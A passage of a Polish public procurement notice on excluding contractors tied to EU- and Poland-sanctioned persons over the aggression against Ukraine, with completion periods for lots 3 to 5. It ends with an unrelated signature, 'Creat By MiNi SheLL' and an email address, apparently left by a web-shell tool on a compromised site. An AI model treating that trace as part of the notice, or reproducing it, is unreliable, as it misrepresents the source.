(WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz.Urz.UEL134 z 20.05.2006, str. 1, ze zm.; dalej: rozporządzenie 765/2006) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz.Urz.UE L 78 z 17.03.2014, str. 6, ze zm.; dalej: rozporządzenie 269/2014) albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r., poz. 129 ze zm.);<br/>2) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (t.j. Dz.U. z 2022 r. poz. 593 ze zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r., poz. 129 ze zm.);<br/>3) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (t.j. Dz.U. z 2021 r. poz. 217 ze zm.) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2023 r., poz. 129 ze zm.);<br/>2. Wykluczenie, o którym mowa w ust. 3, następuje na okres trwania okoliczności określonych w ust. 3.<br/>3. W przypadku wykonawcy wykluczonego na podstawie ust. 3, Zamawiający odrzuca ofertę takiego wykonawcy.<br/>4. Termin wykonania zamówienia: <br/>Część 3: 10 -25 dni<br/>Część 4: 45 -75 dni<br/>Część 5: 25 -50 dni

Creat By MiNi SheLL
Email: jattceo@gmail.com